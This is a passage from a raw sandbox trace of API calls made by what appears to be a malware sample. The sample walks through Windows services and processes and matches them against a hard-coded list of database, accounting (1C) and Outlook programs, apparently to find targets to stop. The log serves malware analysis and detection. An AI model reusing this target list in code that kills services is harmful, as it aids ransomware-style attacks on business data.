lpString2="CscService") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0030.747] lstrlenW (lpString="DcomLaunch") returned 10 [0030.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0030.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0030.747] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0030.747] lstrlenW (lpString="Dhcp") returned 4 [0030.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0030.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0030.747] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0030.747] lstrlenW (lpString="Dnscache") returned 8 [0030.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0030.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0030.747] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0030.747] lstrlenW (lpString="DPS") returned 3 [0030.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0030.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0030.747] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0030.747] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0030.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0030.747] lstrlenW (lpString="eventlog") returned 8 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0030.748] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0030.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0030.748] lstrlenW (lpString="EventSystem") returned 11 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0030.748] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0030.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0030.748] lstrlenW (lpString="gpsvc") returned 5 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0030.748] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0030.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0030.748] lstrlenW (lpString="iphlpsvc") returned 8 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0030.748] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0030.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0030.748] lstrlenW (lpString="LanmanServer") returned 12 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0030.748] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0030.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0030.748] lstrlenW (lpString="LanmanWorkstation") returned 17 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0030.748] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0030.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0030.748] lstrlenW (lpString="lmhosts") returned 7 [0030.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0030.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0030.748] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0030.749] lstrlenW (lpString="MMCSS") returned 5 [0030.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0030.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0030.749] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0030.749] lstrlenW (lpString="MpsSvc") returned 6 [0030.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0030.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0030.749] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0030.749] lstrlenW (lpString="Netman") returned 6 [0030.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0030.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0030.749] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0030.749] lstrlenW (lpString="netprofm") returned 8 [0030.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0030.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0030.749] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0030.749] lstrlenW (lpString="NlaSvc") returned 6 [0030.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0030.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0030.749] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0030.749] lstrlenW (lpString="nsi") returned 3 [0030.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0030.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0030.749] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0030.749] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0030.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0030.750] lstrlenW (lpString="PcaSvc") returned 6 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0030.750] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0030.750] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0030.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0030.750] lstrlenW (lpString="PlugPlay") returned 8 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0030.750] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0030.750] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0030.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0030.750] lstrlenW (lpString="Power") returned 5 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0030.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0030.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0030.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0030.750] lstrlenW (lpString="ProfSvc") returned 7 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0030.750] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0030.750] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0030.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0030.750] lstrlenW (lpString="RpcEptMapper") returned 12 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0030.750] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0030.750] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0030.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0030.750] lstrlenW (lpString="RpcSs") returned 5 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0030.750] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0030.750] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0030.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0030.750] lstrlenW (lpString="SamSs") returned 5 [0030.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0030.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0030.751] lstrlenW (lpString="Schedule") returned 8 [0030.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0030.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0030.751] lstrlenW (lpString="SENS") returned 4 [0030.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0030.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0030.751] lstrlenW (lpString="ShellHWDetection") returned 16 [0030.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0030.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0030.751] lstrlenW (lpString="Spooler") returned 7 [0030.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0030.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0030.751] lstrlenW (lpString="SysMain") returned 7 [0030.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0030.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0030.751] lstrlenW (lpString="Themes") returned 6 [0030.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0030.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0030.751] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0030.751] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0030.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0030.751] lstrlenW (lpString="TrkWks") returned 6 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0030.752] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0030.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0030.752] lstrlenW (lpString="UxSms") returned 5 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0030.752] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0030.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0030.752] lstrlenW (lpString="WdiServiceHost") returned 14 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0030.752] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0030.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0030.752] lstrlenW (lpString="WdiSystemHost") returned 13 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0030.752] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0030.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0030.752] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0030.752] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0030.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0030.752] lstrlenW (lpString="Winmgmt") returned 7 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0030.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0030.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0030.752] lstrlenW (lpString="WPDBusEnum") returned 10 [0030.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0030.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0030.752] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0030.753] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0030.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0030.753] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a91e0 | out: hHeap=0x570000) returned 1 [0030.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0030.759] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0030.759] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0030.760] lstrlenW (lpString="System") returned 6 [0030.760] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0030.760] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0030.760] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0030.760] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0030.760] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0030.760] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0030.760] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0030.760] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0030.760] lstrlenW (lpString="smss.exe") returned 8 [0030.760] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0030.760] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0030.760] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0030.760] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0030.760] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0030.760] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0030.760] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0030.761] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.761] lstrlenW (lpString="csrss.exe") returned 9 [0030.761] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0030.761] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0030.761] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0030.761] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0030.761] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0030.761] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0030.761] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0030.761] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0030.762] lstrlenW (lpString="wininit.exe") returned 11 [0030.762] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0030.762] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0030.762] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0030.762] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0030.762] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0030.762] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0030.762] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0030.762] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.763] lstrlenW (lpString="csrss.exe") returned 9 [0030.763] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0030.763] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0030.763] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0030.763] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0030.763] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0030.763] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0030.763] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0030.763] lstrlenW (lpString="winlogon.exe") returned 12 [0030.763] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0030.764] lstrlenW (lpString="services.exe") returned 12 [0030.764] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0030.765] lstrlenW (lpString="lsass.exe") returned 9 [0030.765] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0030.765] lstrlenW (lpString="lsm.exe") returned 7 [0030.765] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.766] lstrlenW (lpString="svchost.exe") returned 11 [0030.766] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.766] lstrlenW (lpString="svchost.exe") returned 11 [0030.766] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.767] lstrlenW (lpString="svchost.exe") returned 11 [0030.767] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.767] lstrlenW (lpString="svchost.exe") returned 11 [0030.767] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.768] lstrlenW (lpString="svchost.exe") returned 11 [0030.768] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0030.768] lstrlenW (lpString="audiodg.exe") returned 11 [0030.768] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 